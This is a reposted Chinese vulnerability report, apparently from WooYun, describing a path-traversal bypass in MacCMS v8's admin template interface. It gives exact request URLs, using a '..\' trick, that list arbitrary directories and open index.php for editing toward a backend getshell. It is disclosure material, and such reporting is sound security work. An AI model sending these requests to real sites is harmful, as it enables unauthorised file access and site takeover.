大家好,欢迎来到IT知识分享网。
### 简要描述:
现在 V8版本 基本全部文件都有zend加密了。
而且还有360_safe3.php保护
刚开始以为没搞头的,结果有个妹子发来微信。
妹子:在干嘛?
我:挖洞
妹子:一个人挖?
我:对啊!
妹子:我过去陪你一起挖吧!
我马上关机。擦,想跟老子抢乌云币?果断一个人作死开挖
### 详细说明:
注意下,这里@农村教师 [WooYun: 苹果CMS全版本getshell打包第一弹](http://www.wooyun.org/bugs/wooyun-2014-052217) 之前提交过类似的后台getshell,但是修补了。。。
不废话,直接可耻的绕过它
1. 目录浏览
maccms后台有个接口,但是限制了,只能访问目录template里的文件
http://localhost/maccms8/admin/?m=template-list-path-../template/
[
](https://images.seebug.org/upload/201405/25145409212969b4dd38add1fb5dc09b1aaea965.jpg)
访问其他目录也被默认访问了template目录
[](https://images.seebug.org/upload/201405/251454251089047a6d1cf85208c6470e2307391b.jpg)
试图跳出template目录出错
[](https://images.seebug.org/upload/201405/251454406403a432eb49631bb59c9fe09cc39db8.jpg)
绕过姿势(这个案例之前乌云上有过)
http://localhost/maccms8/admin/?m=template-list-path-../template/..\
[](https://images.seebug.org/upload/201405/25145451561d1968470fd8290fc4bfa1f5a5ccda.jpg)
2. 编辑文件(不能直接新建)
与列目录类似,这里直接给出接口(乌云编辑器转义了,直接看图吧)
http://localhost/maccms8/admin/?m=template-info-file-../template/..\\/index.php
### 漏洞证明:
[](https://images.seebug.org/upload/201405/251456140d058be6cc6ebefd2206bcea9a32fcc4.jpg)
免责声明:本站所有文章内容,图片,视频等均是来源于用户投稿和互联网及文摘转载整编而成,不代表本站观点,不承担相关法律责任。其著作权各归其原作者或其出版社所有。如发现本站有涉嫌抄袭侵权/违法违规的内容,侵犯到您的权益,请在线联系站长,一经查实,本站将立刻删除。 本文来自网络,若有侵权,请联系删除,如若转载,请注明出处:https://yundeesoft.com/12979.html
